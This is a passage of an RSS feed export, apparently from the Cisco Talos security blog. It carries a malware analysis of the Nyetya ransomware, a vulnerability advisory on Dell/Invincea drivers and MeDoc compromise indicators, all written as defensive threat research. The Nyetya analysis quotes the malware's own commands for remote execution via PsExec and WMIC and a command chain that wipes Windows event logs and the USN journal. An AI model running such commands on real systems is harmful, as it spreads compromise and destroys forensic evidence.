&amp;nbsp;This includes providing them a separate network architecture, increased monitoring and hunting activities in those at-risk systems and networks and allowing only the level of access absolutely necessary to conduct business. &amp;nbsp;Patching and upgrades should be prioritized on these systems and customers should move to transition these systems to Windows 10, following the &lt;a href="https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/"&gt;guidance from Microsoft&lt;/a&gt; on securing those systems. &amp;nbsp;Additional guidance for network security baselining is available &lt;a href="http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/Baseline_Security/securebasebook.html"&gt;from Cisco as well&lt;/a&gt;. &amp;nbsp;Network IPS should be deployed on connections between international organizations and their Ukrainian branches and endpoint protection should be installed immediately on all Ukrainian systems.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Talos places this attack in the supply-chain category. &amp;nbsp;Rather than targeting organizations directly, an actor compromises trusted hardware and software vendors to deliver compromised assets to a high-priority environment. &amp;nbsp;We believe that these types of malicious capabilities are highly desired by sophisticated actors. &amp;nbsp;All vendors, regardless of size or geographic region, must be increasingly vigilant. 
&amp;nbsp;Find out more about how Cisco assures the &lt;a href="https://blogs.cisco.com/security/cybersecurity-the-holistic-trust-approach"&gt;integrity of their products here&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For further coverage of the Nyetya incident, please refer to our &lt;a href="http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"&gt;previous blog post&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;Indicators of Compromise&lt;/h3&gt;&lt;h4&gt;SHA256&lt;/h4&gt;&lt;h4&gt;M.E.Doc ZvitPublishedObjects.dll files with backdoor:&lt;/h4&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740&lt;/li&gt;&lt;li&gt;d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac&lt;/li&gt;&lt;li&gt;2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h4&gt;Nyetya Malware:&lt;/h4&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Malicious IP Addresses:&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;176.31.182[.]167&lt;/li&gt;&lt;li&gt;159.148.186[.]214&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;AMP Coverage&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;W32.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.F9D6FE8BD8.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.D462966166.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.2FD2863D71.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.02EF73BD24-95.SBX.TG&lt;/li&gt;&lt;li&gt;W32.GenericKD:Petya.20h1.1201&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=xX_tCOnymFk:fzf_0n7C0dY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/xX_tCOnymFk" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T09:55:00.357-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s72-c/Screenshot%2B2017-07-04%2B11.03.09.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/the-medoc-connection.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Dell Precision Optimizer and Invincea Vulnerabilities</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/GK1_4XepLy0/vulnerability-spotlight-dell-precision.html</link><category>CVE-2016-8732</category><category>CVE-2016-9038</category><category>CVE-2017-2802</category><category>dell</category><category>invincea</category><category>Vulnerability</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Martin Lee)</author><pubDate>Fri, 30 Jun 2017 11:05:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-9119534736444221448</guid><description>Vulnerabilities discovered by Marcin ‘Icewall’ Noga of Cisco Talos.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Overview&lt;/h2&gt;&lt;br /&gt;Talos are releasing advisories for vulnerabilities in the Dell Precision Optimizer application  service software, Invincea-X and Invincea Dell Protected Workspace. These packages are pre-installed on certain Dell systems. 
Vulnerabilities present in these applications could allow attackers to disable security mechanisms, escalate privileges and execute arbitrary code within the context of the application user.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Vulnerability Details&lt;/h2&gt;&lt;h3&gt;Privilege Escalation Vulnerability TALOS-2016-0256 (CVE-2016-9038)&lt;/h3&gt;&lt;br /&gt;This vulnerability is a double fetch in the SboxDrv.sys driver. The vulnerability is triggered by sending crafted data to the \Device\SandboxDriverApi device driver, which is read/write accessible to everyone. Successful exploitation results in an arbitrary value being written to kernel memory space, which can lead to local privilege escalation.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Invincea-X, Dell Protected Workspace 6.1.3-24058&lt;br /&gt;&lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0256"&gt;TALOS-2016-0256&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Protection Bypass Vulnerability TALOS-2016-0246 (CVE-2016-8732)&lt;/h3&gt;&lt;br /&gt;Invincea Dell Protected Workspace is a security solution offered by Dell that seeks to provide enhanced protection for endpoints. Multiple security flaws exist within one of the driver components, ‘InvProtectDrv.sys’, which is included in version 5.1.1-22303 of this software. Due to weak restrictions on the driver communications channel, as well as insufficient validation, an attacker-controlled application that is executed on an affected system could leverage this driver to effectively disable some of the protection mechanisms provided by the software.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Invincea, Dell Protected Workspace 5.1.1-22303&lt;br /&gt;This vulnerability is fixed in the 6.3.0 release of the software. 
&lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0246"&gt;TALOS-2016-0246&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Protection Bypass Vulnerability TALOS-2016-0247 (CVE-2017-2802)&lt;/h3&gt;&lt;br /&gt;During the start of ‘Dell PPO Service’, supplied by the Dell Precision Optimizer application, the program “c:\Program Files\Dell\PPO\poaService.exe” loads the DLL “c:\Program Files\Dell\PPO\ati.dll”. This in turn attempts to load “atiadlxx.dll”, which is not present by default in the application directory. The program searches for an appropriately named DLL in the directories specified by the PATH environment variable. If it finds a DLL with the same name, it will load the DLL into poaService.exe without checking the signature of the DLL. This can lead to execution of arbitrary code if an attacker supplies a malicious DLL of the correct name. &lt;br /&gt;&lt;br /&gt;Dell has released an update to resolve this issue. All versions from v4.0 onwards are not vulnerable; for more information see: &lt;a href="https://www.dell.com/optimizer"&gt;www.dell.com/optimizer&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Dell Precision Tower 5810 with NVIDIA graphics cards, PPO Policy Processing Engine (3.5.5.0), ati.dll (PPR Monitoring Plugin) (3.5.5.0).&lt;br /&gt;&lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0247"&gt;TALOS-2016-0247&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Security Implications&lt;/h2&gt;&lt;br /&gt;Given that the Invincea Dell Protected Workspace is an application that is commonly deployed to secure workstations within high-security environments, it is recommended that organizations using affected versions of this solution update to the latest version as quickly as possible to ensure that the protections provided by this software cannot be bypassed by an attacker. 
Dell Protected Workspace is based on Invincea's software. Dell is currently working on providing an update to incorporate Invincea's fix. Organisations need to carefully consider the risks and benefits of software bundled with devices. Potentially, any software may contain exploitable vulnerabilities. Bundled software can provide useful functionality, but if it is unused, allowing it to persist on devices exposes organisations to vulnerabilities without providing any benefits in return. As with any unused software, removing the software removes its associated vulnerabilities and removes an additional package from patching schedules.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;br /&gt;The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules: 41306 - 41309, 41312 - 41313&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=GK1_4XepLy0:wsRIGt68t8U:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/GK1_4XepLy0" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T14:00:10.594-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/vulnerability-spotlight-dell-precision.html</feedburner:origLink></item><item><title>New Ransomware Variant "Nyetya" Compromises Systems Worldwide</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/308HM9R-tjw/worldwide-ransomware-variant.html</link><category>AMP</category><category>Coverage</category><category>Nyetya</category><category>ransomware</category><category>SMBv1</category><category>Snort</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Tue, 27 Jun 2017 11:02:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-3791719894738262452</guid><description>&lt;i&gt;&lt;b&gt;Note: &lt;/b&gt;This blog post discusses active research by Talos into a new threat. 
This information should be considered preliminary and will be updated as research continues.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Update 2017-07-06 12:30 EDT: Updated to explain the modified DoublePulsar backdoor&lt;/i&gt;.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s1600/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="432" data-original-width="768" height="360" src="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s640/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Since the SamSam attacks that targeted US healthcare entities in March 2016, Talos has been concerned about the proliferation of malware via unpatched network vulnerabilities. In May 2017, WannaCry ransomware took advantage of a vulnerability in SMBv1 and spread like wildfire across the Internet.&lt;br /&gt;&lt;br /&gt;Today a new malware variant has surfaced that is distinct enough from Petya that people have referred to it by various names such as Petrwrap and GoldenEye. Talos is identifying this new malware variant as Nyetya. The sample leverages EternalBlue, EternalRomance, WMI, and PsExec for lateral movement inside an affected network. This behavior is detailed later in the blog under "Malware Functionality".  Unlike WannaCry, Nyetya does not appear to contain an external scanning component.  &lt;br /&gt;&lt;br /&gt;The identification of the initial vector is still under investigation. We have observed &lt;b&gt;no use&lt;/b&gt; of email or Office documents as a delivery mechanism for this malware. 
We believe that infections are associated with software update systems for a Ukrainian tax accounting package called MeDoc. Talos is investigating this currently.&lt;br /&gt;&lt;br /&gt;Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated. Talos strongly recommends users and organizations decline to pay the ransom. Any attempts to obtain a decryption key will be fruitless, as the associated mailbox used for payment verification and decryption key sharing has been shut down by posteo.de. This renders any successful payment useless, as there is no method of communication available for this actor to use to verify payments from victims or distribute decryption keys once ransom payments have been received. There is also no method used by the malware to directly connect to command and control for remote unlocking.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2 id="h.hk5xzbqepboi"&gt;Recovery of User Credentials&lt;/h2&gt;Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the "Malware Functionality" section). Talos has identified three ways Nyetya can obtain these credentials.&lt;br /&gt;&lt;br /&gt;First, credentials can be manually passed in via a command line argument. Here is the syntax:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;rundll32.exe C:\Windows\perfc.dat,#1 60 "username:password"&lt;/pre&gt;&lt;br /&gt;A second method consists of using the CredEnumerateW Windows API.&lt;br /&gt;&lt;br /&gt;Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32-bit and 64-bit) while the third one is the PsExec binary. 
The executables related to credential recovery are dropped as temporary files in the user’s %TEMP% folder and run with a named pipe parameter (containing a GUID). The main executable communicates with the dropped executable using this named pipe.&amp;nbsp; For example:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;C:\WINDOWS\TEMP\561D.tmp, \\.\pipe\{C1F0BF2D-8C17-4550-AF5A-65A22C61739C}&lt;/pre&gt;&lt;br /&gt;The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques.&lt;i&gt;&lt;b&gt; However, Talos has confirmed that the executable is not specifically the Mimikatz tool.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;The recovered credentials are then used for launching the malware on the remote system using WMIC and PsExec. This is detailed below.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.a8qzukac72jg"&gt;Malware Functionality &lt;/h2&gt;Perfc.dat contains the functionality needed to further compromise the system and contains a single unnamed export function referred to as #1. As part of the propagation process, the malware enumerates all visible machines on the network via the NetServerEnum API call and then scans for an open TCP 139 port. 
This is done to compile a list of devices that expose this port and may possibly be susceptible to compromise.&lt;br /&gt;&lt;br /&gt;Nyetya has several mechanisms that are used to propagate once a device is infected:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;EternalBlue - the same exploit used by WannaCry.&lt;/li&gt;&lt;li&gt;EternalRomance - an SMBv1 exploit leaked by "ShadowBrokers".&lt;/li&gt;&lt;li&gt;PsExec - a legitimate Windows administration tool.&lt;/li&gt;&lt;li&gt;WMI - Windows Management Instrumentation, a legitimate Windows component.&lt;/li&gt;&lt;/ol&gt;These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally.&lt;br /&gt;&lt;br /&gt;For systems that have not had &lt;a href="https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"&gt;MS17-010&lt;/a&gt; applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;EternalBlue&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Windows Server 2008 R2&lt;/li&gt;&lt;li&gt;Windows Server 2008&lt;/li&gt;&lt;li&gt;Windows 7&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;EternalRomance&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Windows XP&lt;/li&gt;&lt;li&gt;Windows Server 2003&lt;/li&gt;&lt;li&gt;Windows Vista&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;The two exploits drop a modified version of DoublePulsar, which is a persistent backdoor running in kernel space of the compromised system. The developer modified only a few bytes of the original version, but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. 
The modification can be divided into three parts:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The attacker modified the command codes:&lt;/li&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Original Command Code&lt;/td&gt;&lt;td&gt;Nyetya Command Code&lt;/td&gt;&lt;td&gt;Purpose&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x23&lt;/td&gt;&lt;td&gt;0xF0&lt;/td&gt;&lt;td&gt;PING&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x77&lt;/td&gt;&lt;td&gt;0xF1&lt;/td&gt;&lt;td&gt;KILL&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0xC8&lt;/td&gt;&lt;td&gt;0xF2&lt;/td&gt;&lt;td&gt;EXEC&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;li&gt;The attacker modified the response codes:&lt;/li&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Original Response Code&lt;/td&gt;&lt;td&gt;Nyetya Response Code&lt;/td&gt;&lt;td&gt;Purpose&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x10&lt;/td&gt;&lt;td&gt;0x11&lt;/td&gt;&lt;td&gt;OK&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x20&lt;/td&gt;&lt;td&gt;0x21&lt;/td&gt;&lt;td&gt;CMD_INVALID&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x30&lt;/td&gt;&lt;td&gt;0x31&lt;/td&gt;&lt;td&gt;ALLOCATION_FAILURE&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;li&gt;The attacker modified where the response code is stored in the SMB response packet. In the original version of DoublePulsar, the code was stored in the MultiplexID field (offset 0x1E). In the Nyetya version, the response code is stored in a reserved field (offset 0x16) which is normally set to 0x0000.&lt;/li&gt;&lt;/ul&gt;We implemented a specific NGIPS / Snort rule to detect this DoublePulsar variant: 43459. &lt;br /&gt;&lt;br /&gt;PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's Windows token (from the "Recovery of User Credentials" section above) to install the malware on the networked device. 
&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;C:\WINDOWS\dllhost.dat \\w.x.y.z -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60&lt;/pre&gt;&lt;br /&gt;WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the "Recovery of User Credentials" section above. &lt;br /&gt;&lt;br /&gt;&lt;pre&gt;Wbem\wmic.exe /node:"w.x.y.z" /user:"username" /password:"password" "process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"&lt;/pre&gt;&lt;br /&gt;Once a system is successfully compromised, the malware encrypts files on the host using 2048-bit RSA encryption. Additionally, the malware cleans event logs on the compromised device using the following command:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;wevtutil cl Setup &amp;amp; wevtutil cl System &amp;amp; wevtutil cl Security &amp;amp; wevtutil cl Application &amp;amp; fsutil usn deletejournal /D %c:&lt;/pre&gt;&lt;br /&gt;Nyetya attempts to obtain administrative privileges (SeShutdownPrivilege and SeDebugPrivilege) for the current user through the Windows API AdjustTokenPrivileges. If successful, Nyetya overwrites the boot sector on PhysicalDrive0 without first saving a copy. If overwriting the boot sector fails, Nyetya instead wipes the first ten sectors of the disk drive. Additionally, if Nyetya finds a process file name hash of 2E214B44 on the system, it will also wipe the first ten sectors of the disk drive. Talos has identified that this hash refers to avp.exe, which corresponds to Kaspersky Anti-virus. 
Systems whose boot sector has been overwritten will display this message when restarted.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-gY_ZCZZeYSk/WVLtS0FVbEI/AAAAAAAABJU/AOl5CIIpaSUWmKGhEBnJclwpnK-a0NM0gCLcBGAs/s1600/Nyetya-ransom-screen.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1440" height="353" src="https://4.bp.blogspot.com/-gY_ZCZZeYSk/WVLtS0FVbEI/AAAAAAAABJU/AOl5CIIpaSUWmKGhEBnJclwpnK-a0NM0gCLcBGAs/s640/Nyetya-ransom-screen.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Screenshot of a system compromised by Nyetya.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection.&lt;br /&gt;&lt;br /&gt;Without analyzing the key generation or key storage components, Talos believes that the actors behind Nyetya did not intend for the boot sector or the ten sectors that are wiped to be restorable. Thus, Nyetya is intended to be destructive rather than a tool for financial gain.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.dhwqfl8vf3y7"&gt;Mitigation and Prevention&lt;/h2&gt;There are several ways customers can mitigate and prevent Nyetya from impacting their environment. &lt;br /&gt;&lt;ul&gt;&lt;li&gt;First and foremost, we strongly recommend that customers who have NOT yet applied MS17-010 do so immediately. 
Given the severity of the vulnerability and the widely available tools that exploit it, leaving this vulnerability unpatched is unwise.&lt;/li&gt;&lt;li&gt;Ensure you have anti-malware software deployed on your systems that can detect and block the execution of known malicious executables.&lt;/li&gt;&lt;li&gt;Implement a disaster recovery plan that includes backing up and restoring data from backup devices that are kept offline. Adversaries frequently target backup mechanisms to limit the chance that a user can restore their files without paying the ransom.&lt;/li&gt;&lt;li&gt;Disable SMBv1, if possible, on networks and move to a newer version of SMB. (SMBv2 was introduced with Windows Vista.)&lt;/li&gt;&lt;li&gt;Organizing your networks into a number of well-defined logical segments, and allowing access to network assets only to those users and systems within a segment, may help with containing outbreaks of self-spreading worms such as Nyetya.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;As Nyetya attempts to overwrite the boot sector on an infected machine, Talos tested using &lt;a href="https://www.talosintelligence.com/mbrfilter"&gt;MBRFilter&lt;/a&gt; to prevent any changes to the system boot sector. 
This test proved successful and the machine boot sector remained intact in a good state.&amp;nbsp; For users or enterprises that can do so, we recommend using MBRFilter.&amp;nbsp; Note that MBRFilter is an open source project from Talos and no warranties or guarantees are provided.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.6kl8n16ffhdt"&gt;Coverage&lt;/h2&gt;&lt;div id="h.sl1h3yby30q8"&gt;Cisco customers are protected from Nyetya via the following products and services.&lt;/div&gt;&lt;div id="h.sl1h3yby30q8"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-arfMQxDGClk/WVLuhtJ--4I/AAAAAAAABJc/5X2wZDQ7fe4VW8sOKXiS5UEvrlYI2rbiACLcBGAs/s1600/amp-netsec-tg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1342" data-original-width="1600" height="335" src="https://3.bp.blogspot.com/-arfMQxDGClk/WVLuhtJ--4I/AAAAAAAABJc/5X2wZDQ7fe4VW8sOKXiS5UEvrlYI2rbiACLcBGAs/s400/amp-netsec-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div id="h.sl1h3yby30q8"&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; can detect malicious activity associated with this threat.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps 
identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;Email and web have not been identified as attack vectors at this time. Additionally, there are no known C2 elements related to this malware at this time.  The malware, if transferred across these systems on your networks, will be blocked.&lt;br /&gt;&lt;br /&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on &lt;a href="https://www.snort.org/products"&gt;Snort.org&lt;/a&gt;.&lt;/div&gt;&lt;h3 id="h.2mb1e0vweyf9"&gt;NGIPS / Snort Rules&lt;/h3&gt;The following NGIPS / Snort rules detect this threat:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;42944 - OS-WINDOWS Microsoft Windows SMB remote code execution attempt&lt;/li&gt;&lt;li&gt;42340 - OS-WINDOWS Microsoft Windows SMB anonymous session IPC share access attempt&lt;/li&gt;&lt;li&gt;41984 - OS-WINDOWS Microsoft Windows SMBv1 identical MID and FID type confusion attempt&lt;/li&gt;&lt;li&gt;43459 - MALWARE-CNC Win.Trojan.Doublepulsar variant successful ping response&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;The following NGIPS / Snort rules are also indicators of infection traffic:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;5718 - OS-WINDOWS Microsoft Windows SMB-DS Trans unicode Max Param/Count OS-WINDOWS attempt&lt;/li&gt;&lt;li&gt;1917 - INDICATOR-SCAN UPnP service discover attempt&lt;/li&gt;&lt;li&gt;5730 - OS-WINDOWS Microsoft Windows SMB-DS Trans Max Param OS-WINDOWS attempt&lt;/li&gt;&lt;li&gt;26385 - FILE-EXECUTABLE Microsoft Windows executable file save onto SMB share attempt&lt;/li&gt;&lt;li&gt;43370 - NETBIOS DCERPC possible wmi remote process launch&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h3 id="h.7vb8fcv8lfs1"&gt;Threat Grid&lt;/h3&gt;Threat Grid is capable of detecting malware samples related to Nyetya as malicious.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://2.bp.blogspot.com/-zcF5-O83Wlw/WVLwsJHiVbI/AAAAAAAABJo/ZNvZIC31vmMGmDfObcoWPhPJ9shh3qJ3QCLcBGAs/s1600/Screen%2BShot%2B2017-06-27%2Bat%2B6.13.52%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="629" data-original-width="1600" height="249" src="https://2.bp.blogspot.com/-zcF5-O83Wlw/WVLwsJHiVbI/AAAAAAAABJo/ZNvZIC31vmMGmDfObcoWPhPJ9shh3qJ3QCLcBGAs/s640/Screen%2BShot%2B2017-06-27%2Bat%2B6.13.52%2BPM.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.ppbli1igosey"&gt;Indicators of Compromise (IOCs)&lt;/h2&gt;&lt;h3 id="h.kgemys46433z"&gt;AMP Coverage&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;W32.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;/ul&gt;&lt;h3 id="h.74psw8p2s4b5"&gt;SHA256&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (password stealer)&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=308HM9R-tjw:yPbtD0pbOmI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
